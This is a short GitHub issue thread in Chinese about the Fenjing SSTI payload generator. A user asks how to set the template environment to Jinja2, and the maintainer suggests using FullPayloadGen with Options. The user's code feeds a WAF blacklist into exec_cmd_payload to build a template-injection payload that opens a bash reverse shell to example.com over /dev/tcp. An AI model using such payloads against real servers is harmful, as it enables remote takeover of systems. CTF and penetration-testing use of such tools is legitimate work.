### ISSUE TITLE
如何在代码中修改 TemplateEnvironment

### ISSUE THREAD

**Issue by chi111i** [Marven11/Fenjing#48]
from fenjing import exec_cmd_payload, config_payload
import logging
logging.basicConfig(level = logging.INFO)

def waf(s: str):
    blacklist = [
        "config", "self", "g", "os", "class", "length", "mro", "base", "lipsum",
        "[", '"', "'", "_", ".", "+", "~", "{{",
        "0", "1", "2", "3", "4", "5", "6", "7", "8", "9",
        "０","１","２","３","４","５","６","７","８","９"
    ]
    return all(word not in s for word in blacklist)

if __name__ == "__main__":
    shell_payload, _ = exec_cmd_payload(waf, "bash -c \"bash -i >& /dev/tcp/example.com/3456 0>&1\"")
    # config_payload = config_payload(waf)

    print(f"{shell_payload=}")
    # print(f"{config_payload=}")

如何指定环境为 TemplateEnvironment.JINJA2

**Comment by Marven11** [comment]
那里忘记加上选项了，暂时用下面这个方法

```python
FullPayloadGen(waf).generate("os_popen_read", cmd, options=Options(...)) # 替代exec_cmd_payload(...)
```
